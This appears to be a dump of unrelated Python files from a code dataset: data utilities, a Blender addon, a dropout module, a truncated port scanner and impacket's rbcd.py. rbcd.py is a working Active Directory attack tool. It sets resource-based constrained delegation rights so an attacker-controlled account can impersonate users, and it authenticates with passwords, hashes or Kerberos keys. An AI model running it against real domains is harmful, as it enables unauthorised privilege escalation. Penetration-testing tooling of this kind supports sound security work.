max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
test/tst_refcount.py | timgates42/netcdf4-python | 574 | 11186538 | import unittest, netCDF4, tempfile, os
file_name = tempfile.NamedTemporaryFile(suffix='.nc', delete=False).name
class RefCountTestCase(unittest.TestCase):
def setUp(self):
nc = netCDF4.Dataset(file_name, mode='w', keepweakref=True, format='NETCDF4')
d = nc.createDimension('fred', 2000)
v = nc.createVariable('frank','f',('fred',))
self.file = file_name
self.nc = nc
def tearDown(self):
# Remove the temporary files
os.remove(self.file)
def runTest(self):
"""testing garbage collection (issue 218)"""
# this should trigger garbage collection (__dealloc__ method)
del self.nc
# if __dealloc__ not called to close file, then this
# will fail with "Permission denied" error (since you can't
# open a file 'w' that is already open for writing).
nc = netCDF4.Dataset(self.file, mode='w', format='NETCDF4')
if __name__ == '__main__':
unittest.main()
|
imdb-wiki-dir/download_imdb_wiki.py | mzl9039/imbalanced-regression | 370 | 11186576 | <gh_stars>100-1000
import os
import wget
print("Downloading IMDB faces...")
imdb_file = "./data/imdb_crop.tar"
wget.download("https://data.vision.ee.ethz.ch/cvl/rrothe/imdb-wiki/static/imdb_crop.tar", out=imdb_file)
print("Downloading WIKI faces...")
wiki_file = "./data/wiki_crop.tar"
wget.download("https://data.vision.ee.ethz.ch/cvl/rrothe/imdb-wiki/static/wiki_crop.tar", out=wiki_file)
print("Extracting IMDB faces...")
os.system(f"tar -xvf {imdb_file} -C ./data")
print("Extracting WIKI faces...")
os.system(f"tar -xvf {wiki_file} -C ./data")
os.remove(imdb_file)
os.remove(wiki_file)
print("\nCompleted!") |
nxt_editor/integration/blender/nxt_blender.py | Mikfr83/nxt_editor | 131 | 11186586 | <gh_stars>100-1000
"""
Loosely based on the example addon from this repo:
https://github.com/robertguetzkow/blender-python-examples
"""
# Builtin
import os
import sys
import subprocess
# External
import bpy
try:
# External
from Qt import QtCore, QtWidgets
# Internal
from nxt_editor.constants import NXT_WEBSITE
from nxt_editor.integration import blender
nxt_installed = True
except ImportError:
nxt_installed = False
NXT_WEBSITE = 'https://nxt-dev.github.io/'
nxt_package_name = 'nxt-editor'
bl_info = {
"name": "NXT Blender",
"blender": (2, 80, 0),
"version": (0, 2, 0),
"location": "NXT > Open Editor",
"wiki_url": "https://nxt-dev.github.io/",
"tracker_url": "https://github.com/nxt-dev/nxt_editor/issues",
"category": "nxt",
"description": "NXT is a general purpose code compositor designed for "
"rigging, scene assembly, and automation. (This is an "
"experimental version of nxt_blender. Save "
"early, save often.)",
"warning": "This addon requires installation of dependencies."
}
class BLENDER_PLUGIN_VERSION(object):
plugin_v_data = {'MAJOR': bl_info["version"][0],
'MINOR': bl_info["version"][1],
'PATCH': bl_info["version"][2]}
MAJOR = plugin_v_data['MAJOR']
MINOR = plugin_v_data['MINOR']
PATCH = plugin_v_data['PATCH']
VERSION_TUPLE = (MAJOR, MINOR, PATCH)
VERSION_STR = '.'.join(str(v) for v in VERSION_TUPLE)
VERSION = VERSION_STR
class CreateBlenderContext(bpy.types.Operator):
bl_label = "Create Remote Blender NXT Context"
bl_idname = "nxt.create_blender_context"
def execute(self, context):
global nxt_installed
if nxt_installed:
b = blender.__NXT_INTEGRATION__
if not b:
b = blender.Blender.launch_nxt()
b.create_context()
else:
show_dependency_warning()
return {'FINISHED'}
class OpenNxtEditor(bpy.types.Operator):
bl_label = "Open NXT Editor"
bl_idname = "nxt.nxt_editor"
def execute(self, context):
global nxt_installed
if nxt_installed:
blender.Blender.launch_nxt()
else:
show_dependency_warning()
return {'FINISHED'}
class AboutNxt(bpy.types.Operator):
bl_label = "Update NXT"
bl_idname = "nxt.nxt_about"
def execute(self, context):
import webbrowser
webbrowser.open_new(NXT_WEBSITE)
return {'FINISHED'}
class TOPBAR_MT_nxt(bpy.types.Menu):
bl_label = "NXT"
def draw(self, context):
layout = self.layout
layout.operator("nxt.nxt_editor", text="Open Editor")
layout.separator()
layout.operator("nxt.nxt_update_dependencies",
text="Update NXT (Requires Blender Restart)")
layout.separator()
layout.operator('nxt.create_blender_context', text='Create Blender '
'Context')
layout.separator()
layout.operator("nxt.nxt_about", text="About")
def menu_draw(self, context):
self.layout.menu("TOPBAR_MT_nxt")
class NxtInstallDependencies(bpy.types.Operator):
bl_idname = 'nxt.nxt_install_dependencies'
bl_label = "Install NXT dependencies"
bl_description = ("Downloads and installs the required python packages "
"for NXT. Internet connection is required. "
"Blender may have to be started with elevated "
"permissions in order to install the package. "
"Alternatively you can pip install nxt-editor into your "
"Blender Python environment.")
bl_options = {"REGISTER", "INTERNAL"}
@classmethod
def poll(cls, context):
global nxt_installed
return not nxt_installed
def execute(self, context):
success = False
environ_copy = dict(os.environ)
environ_copy["PYTHONNOUSERSITE"] = "1"
pkg = 'nxt-editor'
try:
subprocess.run([sys.executable, "-m", "pip", "install", pkg],
check=True, env=environ_copy)
except subprocess.CalledProcessError as e:
self.report({"ERROR"}, str(e))
return {"CANCELLED"}
if not success:
self.report({"INFO"}, 'Please restart Blender to '
'finish installing NXT.')
return {"FINISHED"}
class NxtUpdateDependencies(bpy.types.Operator):
bl_idname = 'nxt.nxt_update_dependencies'
bl_label = "Update NXT dependencies"
bl_description = ("Downloads and updates the required python packages "
"for NXT. Internet connection is required. "
"Blender may have to be started with elevated "
"permissions in order to install the package. "
"Alternatively you can pip install -U nxt-editor into "
"your Blender Python environment.")
bl_options = {"REGISTER", "INTERNAL"}
@classmethod
def poll(cls, context):
global nxt_installed
return nxt_installed
def execute(self, context):
try:
blender.Blender._update_package('nxt-editor')
except subprocess.CalledProcessError as e:
self.report({"ERROR"}, str(e))
return {"CANCELLED"}
self.report({"INFO"}, 'Please restart Blender to '
'finish updating NXT.')
return {"FINISHED"}
class NxtUninstallDependencies(bpy.types.Operator):
bl_idname = 'nxt.nxt_uninstall_dependencies'
bl_label = "Uninstall NXT dependencies"
bl_description = ("Uninstalls the NXT Python packages. "
"Blender may have to be started with elevated "
"permissions in order to install the package. "
"Alternatively you can pip uninstall nxt-editor from "
"your Blender Python environment.")
bl_options = {"REGISTER", "INTERNAL"}
@classmethod
def poll(cls, context):
global nxt_installed
return nxt_installed
def execute(self, context):
try:
blender.Blender().uninstall()
except subprocess.CalledProcessError as e:
self.report({"ERROR"}, str(e))
return {"CANCELLED"}
self.report({"INFO"}, 'Please restart Blender to '
'finish uninstalling NXT dependencies.')
return {"FINISHED"}
class NxtDependenciesPreferences(bpy.types.AddonPreferences):
bl_idname = __name__
def draw(self, context):
layout = self.layout
layout.operator(NxtInstallDependencies.bl_idname, icon="PLUGIN")
layout.operator(NxtUpdateDependencies.bl_idname, icon="SCRIPT")
layout.operator(NxtUninstallDependencies.bl_idname, icon="PANEL_CLOSE")
def show_dependency_warning():
def draw(self, context):
layout = self.layout
lines = [
f"Please install the missing dependencies for the NXT add-on.",
"1. Open the preferences (Edit > Preferences > Add-ons).",
f"2. Search for the \"{bl_info.get('name')}\" add-on.",
"3. Open the details section of the add-on.",
f"4. Click on the \"{NxtInstallDependencies.bl_label}\" button.",
"This will download and install the missing Python packages. "
"You man need to start Blender with elevated permissions",
f"Alternatively you can pip install \"{nxt_package_name}\" into "
f"your Blender Python environment."
]
for line in lines:
layout.label(text=line)
bpy.context.window_manager.popup_menu(draw, title='NXT Warning!',
icon="ERROR")
nxt_operators = (TOPBAR_MT_nxt, OpenNxtEditor, NxtUpdateDependencies,
NxtUninstallDependencies, NxtDependenciesPreferences,
NxtInstallDependencies, CreateBlenderContext)
def register():
global nxt_installed
for cls in nxt_operators:
bpy.utils.register_class(cls)
bpy.utils.register_class(AboutNxt)
bpy.types.TOPBAR_MT_editor_menus.append(TOPBAR_MT_nxt.menu_draw)
def unregister():
try:
if blender.__NXT_INTEGRATION__:
blender.__NXT_INTEGRATION__.quit_nxt()
except NameError:
pass
bpy.types.TOPBAR_MT_editor_menus.remove(TOPBAR_MT_nxt.menu_draw)
for cls in nxt_operators:
bpy.utils.unregister_class(cls)
bpy.utils.unregister_class(AboutNxt)
if __name__ == "__main__":
register()
|
transformer/fairseq/modules/dropout_select.py | joaompereira/adahessian | 162 | 11186605 | <gh_stars>100-1000
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
from torch.nn.parameter import Parameter
import numpy as np
class DropoutSelect(nn.Module):
"""docstring for D"""
def __init__(self, dropout_type, dropout_gama=0.5, inplace=False):
super().__init__()
self.dropout_type = dropout_type
self.dropout_gama = dropout_gama
self.inplace = inplace
dropout_alpha = 1.0
self.dropout_alpha = dropout_alpha
if 1 == "bernoulli":
# multiply based
self.dist = torch.distributions.bernoulli.Bernoulli( torch.tensor([dropout_gama]) )
else:
# inject different types of noise with special control of the variance
if dropout_type == "gamma":
self.dist = torch.distributions.gamma.Gamma( torch.tensor([dropout_alpha]), torch.tensor([dropout_gama]) )
elif dropout_type == "gumbel":
self.dist = torch.distributions.gumbel.Gumbel( torch.tensor([0.0]), torch.tensor([dropout_gama]) )
elif dropout_type == "beta":
self.dist = torch.distributions.beta.Beta( torch.tensor([dropout_alpha]), torch.tensor([dropout_gama]) )
elif dropout_type == "laplace":
self.dist = torch.distributions.laplace.Laplace( torch.tensor([0.0]), torch.tensor([dropout_gama]) )
elif dropout_type == "chi":
self.dist = torch.distributions.chi2.Chi2( torch.tensor([dropout_gama]) )
elif dropout_type == "normal":
self.dist = torch.distributions.normal.Normal( torch.tensor([0.0]), torch.tensor([dropout_gama]) )
def extra_repr(self):
return 'dropout_type={dropout_type}, dropout_gama={dropout_gama}, inplace={inplace}'.format(**self.__dict__)
def forward(self, x, p, training=True):
if training is False:
return x
if self.dropout_type == "none":
return F.dropout( x, p=p, training=True, inplace=self.inplace )
elif self.dropout_type == "bernoulli":
# multiply based
noise = self.dist.expand( x.shape ).sample().to(x.device)
scale = p / self.dropout_gama
x = x * noise * scale
else:
noise = self.dist.expand( x.shape ).sample().to(x.device)
# inject different types of noise with special control of the variance
if self.dropout_type == "gamma":
scale = (p - self.dropout_alpha * self.dropout_gama) * ( self.dropout_alpha ** -0.5 )
elif self.dropout_type == "gumbel":
scale = (6 ** 0.5) * (p - 0.5772 * self.dropout_gama) / np.pi
elif self.dropout_type == "beta":
scale = (self.dropout_alpha + self.dropout_gama) * \
(( ( self.dropout_alpha + self.dropout_gama + 1) / self.dropout_alpha ) ** 0.5) * \
( p - self.dropout_alpha / (self.dropout_alpha + self.dropout_gama) )
elif self.dropout_type == "chi":
scale = ( p - self.dropout_gama ) / (2 ** 0.5)
elif self.dropout_type == "normal":
scale = p
x = x + noise * scale
return x
|
nbviewer/providers/url/__init__.py | AI-Collaboratory/nbviewer | 1,840 | 11186614 | <filename>nbviewer/providers/url/__init__.py
from .handlers import default_handlers
from .handlers import uri_rewrites
|
examples/rbcd.py | kamnsv/impacket | 6,612 | 11186636 | <reponame>kamnsv/impacket
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Python script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer
#
# Authors:
# <NAME> (@podalirius_)
# <NAME> (@_nwodtuhs)
#
# ToDo:
# [ ]: allow users to set a ((-delegate-from-sid or -delegate-from-dn) and -delegate-to-dn) in order to skip ldapdomaindump and explicitely set the SID/DN
import argparse
import logging
import sys
import traceback
import ldap3
import ssl
import ldapdomaindump
from binascii import unhexlify
import os
from ldap3.protocol.formatters.formatters import format_sid
from impacket import version
from impacket.examples import logger, utils
from impacket.ldap import ldaptypes
from impacket.smbconnection import SMBConnection
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
from ldap3.utils.conv import escape_filter_chars
def get_machine_name(args, domain):
if args.dc_ip is not None:
s = SMBConnection(args.dc_ip, args.dc_ip)
else:
s = SMBConnection(domain, domain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
raise Exception('Error while anonymous logging into %s' % domain)
else:
s.logoff()
return s.getServerName()
def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None,
TGT=None, TGS=None, useCache=True):
from pyasn1.codec.ber import encoder, decoder
from pyasn1.type.univ import noValue
"""
logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
:param string user: username
:param string password: <PASSWORD>
:param string domain: domain where the account is valid for (required)
:param string lmhash: LMHASH used to authenticate using hashes (password is not used)
:param string nthash: NTHASH used to authenticate using hashes (password is not used)
:param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
:param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
:param struct TGT: If there's a TGT available, send the structure here and it will be used
:param struct TGS: same for TGS. See smb3.py for the format
:param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
:return: True, raises an Exception if error.
"""
if lmhash != '' or nthash != '':
if len(lmhash) % 2:
lmhash = '0' + lmhash
if len(nthash) % 2:
nthash = '0' + nthash
try: # just in case they were converted already
lmhash = unhexlify(lmhash)
nthash = unhexlify(nthash)
except TypeError:
pass
# Importing down here so pyasn1 is not required if kerberos is not used.
from impacket.krb5.ccache import CCache
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5 import constants
from impacket.krb5.types import Principal, KerberosTime, Ticket
import datetime
if TGT is not None or TGS is not None:
useCache = False
if useCache:
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except Exception as e:
# No cache present
print(e)
pass
else:
# retrieve domain information from CCache file if needed
if domain == '':
domain = ccache.principal.realm['data'].decode('utf-8')
logging.debug('Domain retrieved from CCache: %s' % domain)
logging.debug('Using Kerberos Cache: %s' % os.getenv('KRB5CCNAME'))
principal = 'ldap/%s@%s' % (target.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is None:
# Let's try for the TGT and go from there
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
else:
logging.debug('No valid credentials found in cache')
else:
TGS = creds.toTGS(principal)
logging.debug('Using TGS from cache')
# retrieve user information from CCache file if needed
if user == '' and creds is not None:
user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
logging.debug('Username retrieved from CCache: %s' % user)
elif user == '' and len(ccache.principal.components) > 0:
user = ccache.principal.components[0]['data'].decode('utf-8')
logging.debug('Username retrieved from CCache: %s' % user)
# First of all, we need to get a TGT for the user
userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
if TGT is None:
if TGS is None:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,
aesKey, kdcHost)
else:
tgt = TGT['KDC_REP']
cipher = TGT['cipher']
sessionKey = TGT['sessionKey']
if TGS is None:
serverName = Principal('ldap/%s' % target, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,
sessionKey)
else:
tgs = TGS['KDC_REP']
cipher = TGS['cipher']
sessionKey = TGS['sessionKey']
# Let's build a NegTokenInit with a Kerberos REQ_AP
blob = SPNEGO_NegTokenInit()
# Kerberos
blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]
# Let's extract the ticket from the TGS
tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
ticket = Ticket()
ticket.from_asn1(tgs['ticket'])
# Now let's build the AP_REQ
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
opts = []
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq, 'ticket', ticket.to_asn1)
authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = domain
seq_set(authenticator, 'cname', userName.components_to_asn1)
now = datetime.datetime.utcnow()
authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)
encodedAuthenticator = encoder.encode(authenticator)
# Key Usage 11
# AP-REQ Authenticator (includes application authenticator
# subkey), encrypted with the application session key
# (Section 5.5.1)
encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)
apReq['authenticator'] = noValue
apReq['authenticator']['etype'] = cipher.enctype
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
blob['MechToken'] = encoder.encode(apReq)
request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO',
blob.getData())
# Done with the Kerberos saga, now let's get into LDAP
if connection.closed: # try to open connection if closed
connection.open(read_server_info=False)
connection.sasl_in_progress = True
response = connection.post_send_single_response(connection.send('bindRequest', request, None))
connection.sasl_in_progress = False
if response[0]['result'] != 0:
raise Exception(response)
connection.bound = True
return True
def create_empty_sd():
sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
sd['Revision'] = b'\x01'
sd['Sbz1'] = b'\x00'
sd['Control'] = 32772
sd['OwnerSid'] = ldaptypes.LDAP_SID()
# BUILTIN\Administrators
sd['OwnerSid'].fromCanonical('S-1-5-32-544')
sd['GroupSid'] = b''
sd['Sacl'] = b''
acl = ldaptypes.ACL()
acl['AclRevision'] = 4
acl['Sbz1'] = 0
acl['Sbz2'] = 0
acl.aces = []
sd['Dacl'] = acl
return sd
# Create an ALLOW ACE with the specified sid
def create_allow_ace(sid):
nace = ldaptypes.ACE()
nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
nace['AceFlags'] = 0x00
acedata = ldaptypes.ACCESS_ALLOWED_ACE()
acedata['Mask'] = ldaptypes.ACCESS_MASK()
acedata['Mask']['Mask'] = 983551 # Full control
acedata['Sid'] = ldaptypes.LDAP_SID()
acedata['Sid'].fromCanonical(sid)
nace['Ace'] = acedata
return nace
class RBCD(object):
"""docstring for setrbcd"""
def __init__(self, ldap_server, ldap_session, delegate_to):
super(RBCD, self).__init__()
self.ldap_server = ldap_server
self.ldap_session = ldap_session
self.delegate_from = None
self.delegate_to = delegate_to
self.SID_delegate_from = None
self.DN_delegate_to = None
logging.debug('Initializing domainDumper()')
cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = None
self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf)
def read(self):
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act
self.get_allowed_to_act()
return
def write(self, delegate_from):
self.delegate_from = delegate_from
# Get escalate user sid
result = self.get_user_info(self.delegate_from)
if not result:
logging.error('Account to escalate does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.SID_delegate_from = str(result[1])
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act and build security descriptor including previous data
sd, targetuser = self.get_allowed_to_act()
# writing only if SID not already in list
if self.SID_delegate_from not in [ ace['Ace']['Sid'].formatCanonical() for ace in sd['Dacl'].aces ]:
sd['Dacl'].aces.append(create_allow_ace(self.SID_delegate_from))
self.ldap_session.modify(targetuser['dn'],
{'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE,
[sd.getData()]]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights modified successfully!')
logging.info('%s can now impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
else:
logging.info('%s can already impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)
logging.info('Not modifying the delegation rights.')
# Get list of allowed to act
self.get_allowed_to_act()
return
def remove(self, delegate_from):
self.delegate_from = delegate_from
# Get escalate user sid
result = self.get_user_info(self.delegate_from)
if not result:
logging.error('Account to escalate does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.SID_delegate_from = str(result[1])
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act and build security descriptor including that data
sd, targetuser = self.get_allowed_to_act()
# Remove the entries where SID match the given -delegate-from
sd['Dacl'].aces = [ace for ace in sd['Dacl'].aces if self.SID_delegate_from != ace['Ace']['Sid'].formatCanonical()]
self.ldap_session.modify(targetuser['dn'],
{'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, [sd.getData()]]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights modified successfully!')
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
# Get list of allowed to act
self.get_allowed_to_act()
return
def flush(self):
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act
sd, targetuser = self.get_allowed_to_act()
self.ldap_session.modify(targetuser['dn'], {'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, []]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights flushed successfully!')
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
# Get list of allowed to act
self.get_allowed_to_act()
return
def get_allowed_to_act(self):
# Get target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
self.ldap_session.search(self.DN_delegate_to, '(objectClass=*)', search_scope=ldap3.BASE,
attributes=['SAMAccountName', 'objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity'])
targetuser = None
for entry in self.ldap_session.response:
if entry['type'] != 'searchResEntry':
continue
targetuser = entry
if not targetuser:
logging.error('Could not query target user properties')
return
try:
sd = ldaptypes.SR_SECURITY_DESCRIPTOR(
data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0])
if len(sd['Dacl'].aces) > 0:
logging.info('Accounts allowed to act on behalf of other identity:')
for ace in sd['Dacl'].aces:
SID = ace['Ace']['Sid'].formatCanonical()
SamAccountName = self.get_sid_info(ace['Ace']['Sid'].formatCanonical())[1]
logging.info(' %-10s (%s)' % (SamAccountName, SID))
else:
logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')
except IndexError:
logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')
# Create DACL manually
sd = create_empty_sd()
return sd, targetuser
def get_user_info(self, samname):
self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])
try:
dn = self.ldap_session.entries[0].entry_dn
sid = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])
return dn, sid
except IndexError:
logging.error('User not found in LDAP: %s' % samname)
return False
def get_sid_info(self, sid):
self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % escape_filter_chars(sid), attributes=['samaccountname'])
try:
dn = self.ldap_session.entries[0].entry_dn
samname = self.ldap_session.entries[0]['samaccountname']
return dn, samname
except IndexError:
logging.error('SID not found in LDAP: %s' % sid)
return False
def parse_args():
parser = argparse.ArgumentParser(add_help=True,
description='Python (re)setter for property msDS-AllowedToActOnBehalfOfOtherIdentity for Kerberos RBCD attacks.')
parser.add_argument('identity', action='store', help='domain.local/username[:password]')
parser.add_argument("-delegate-to", type=str, required=True,
help="Target computer account the attacker has at least WriteProperty to")
parser.add_argument("-delegate-from", type=str, required=False,
help="Attacker controlled machine account to write on the msDS-Allo[...] property (only when using `-action write`)")
parser.add_argument('-action', choices=['read', 'write', 'remove', 'flush'], nargs='?', default='read',
help='Action to operate on msDS-AllowedToActOnBehalfOfOtherIdentity')
parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true",
help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If '
'omitted it will use the domain part (FQDN) specified in '
'the identity parameter')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def parse_identity(args):
domain, username, password = utils.parse_credentials(args.identity)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and args.hashes is None and args.no_pass is False and args.aesKey is None:
from getpass import getpass
logging.info("No credentials supplied, supply password")
password = getpass("Password:")
if args.aesKey is not None:
args.k = True
if args.hashes is not None:
lmhash, nthash = args.hashes.split(':')
else:
lmhash = ''
nthash = ''
return domain, username, password, lmhash, nthash
def init_logger(args):
# Init the example's logger theme and debug level
logger.init(args.ts)
if args.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
def init_ldap_connection(target, tls_version, args, domain, username, password, lmhash, nthash):
user = '%s\\%s' % (domain, username)
if tls_version is not None:
use_ssl = True
port = 636
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=tls_version)
else:
use_ssl = False
port = 389
tls = None
ldap_server = ldap3.Server(target, get_info=ldap3.ALL, port=port, use_ssl=use_ssl, tls=tls)
if args.k:
ldap_session = ldap3.Connection(ldap_server)
ldap_session.bind()
ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, args.aesKey, kdcHost=args.dc_ip)
elif args.hashes is not None:
ldap_session = ldap3.Connection(ldap_server, user=user, password=lmhash + ":" + nthash, authentication=ldap3.NTLM, auto_bind=True)
else:
ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True)
return ldap_server, ldap_session
def init_ldap_session(args, domain, username, password, lmhash, nthash):
if args.k:
target = get_machine_name(args, domain)
else:
if args.dc_ip is not None:
target = args.dc_ip
else:
target = domain
if args.use_ldaps is True:
try:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1_2, args, domain, username, password, lmhash, nthash)
except ldap3.core.exceptions.LDAPSocketOpenError:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1, args, domain, username, password, lmhash, nthash)
else:
return init_ldap_connection(target, None, args, domain, username, password, lmhash, nthash)
def main():
print(version.BANNER)
args = parse_args()
init_logger(args)
if args.action == 'write' and args.delegate_from is None:
logging.critical('`-delegate-from` should be specified when using `-action write` !')
sys.exit(1)
domain, username, password, lmhash, nthash = parse_identity(args)
if len(nthash) > 0 and lmhash == "":
lmhash = "aad3b435b51404eeaad3b435b51404ee"
try:
ldap_server, ldap_session = init_ldap_session(args, domain, username, password, lmhash, nthash)
rbcd = RBCD(ldap_server, ldap_session, args.delegate_to)
if args.action == 'read':
rbcd.read()
elif args.action == 'write':
rbcd.write(args.delegate_from)
elif args.action == 'remove':
rbcd.remove(args.delegate_from)
elif args.action == 'flush':
rbcd.flush()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
traceback.print_exc()
logging.error(str(e))
if __name__ == '__main__':
main()
|
Python/Port_Scanner.py | thefool76/hacktoberfest2021 | 448 | 11186656 | <filename>Python/Port_Scanner.py
import socket
import time
portlist = {
"20" : "ftp data transfer",
"21" : "ftp command control",
"22" : "ssh",
"23" : "telnet",
"25" : "smpt",
"53" : "dns",
"80" : "http",
"110" : "pop3",
"111" : "rpcbind",
"119" : "nntp",
"123" : "ntp",
"135" : "msrpc",
"139" : "netbios-ssn",
"143" : "imap",
"161" : "snmp",
"194" : "irc",
"443" : "https",
"445" : "microsoft-ds",
"993" : "imaps",
"1723" : "pptp",
"3306" : "mysql",
"5900" : "vnc",
"8080" : "http-proxy"
}
def check_port(ip, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
rslt = sock.connect_ex((ip, int(port)))
sock.close()
return rslt
except:
return 1
def scan(ip):
